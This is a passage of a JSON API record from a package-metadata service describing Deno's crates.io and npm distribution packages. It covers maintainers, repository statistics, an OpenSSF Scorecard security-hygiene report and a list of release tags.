osyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:41.646Z","updated_at":"2022-11-07T18:29:41.646Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:41.655Z","updated_at":"2022-11-07T18:29:41.655Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11161839,"name":"@deno/darwin-x64","ecosystem":"npm","description":"darwin-x64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:24:31.244Z","latest_release_published_at":"2026-08-27T17:35:53.950Z","latest_release_number":"2.9.6","last_synced_at":"2026-08-29T21:57:09.225Z","created_at":"2024-12-12T21:25:11.582Z","updated_at":"2026-08-29T21:57:09.225Z","registry_url":"https://www.npmjs.com/package/@deno/darwin-x64","install_command":"npm install @deno/darwin-x64","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste